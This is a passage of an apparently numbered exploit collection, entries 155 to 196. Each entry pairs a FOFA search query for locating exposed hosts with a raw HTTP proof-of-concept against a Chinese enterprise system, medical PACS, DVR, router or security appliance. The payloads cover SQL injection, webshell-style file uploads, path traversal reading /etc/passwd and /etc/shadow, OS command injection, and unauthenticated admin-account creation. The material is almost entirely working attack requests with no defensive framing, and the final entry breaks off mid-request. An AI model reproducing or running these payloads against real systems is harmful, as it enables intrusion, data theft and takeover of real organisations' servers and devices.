POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the uploaded file at http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. MetaCRM (美特CRM) upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

Uploaded file: http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达 medical image archiving and communication system (PACS) WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>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</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field sets the file name and the <fileFlow> field carries the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信 ticketing management platform SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 895

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益 value management system (LVS) DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT-高清车牌识别摄像机 (HD license-plate recognition camera) arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point security gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom gateway configuration management system rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"

------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文 engineering management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创 library cluster management system (Interlib) updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼 application virtualization system SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation installations.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体 佳会 video conferencing attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技 clinical browsing system deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. 短视频矩阵营销系统 (short-video matrix marketing system) poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通 electronic document security management system NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下 foreign-trade ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    { get { return true; } }
    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

193. 山石网科云鉴安全管理系统 setSystemTimeAction command execution
FOFA:body="山石云鉴主机安全管理系统"
Obtain a CSRF token for the session:
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0


Submit the payload with that token (the command writes a marker into a file under the web root):
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 97

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')


Verify by fetching the written file:
GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0


194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--


195. 飞鱼星上网行为管理系统 send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}


196. 河南省风速科技统一认证平台 password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
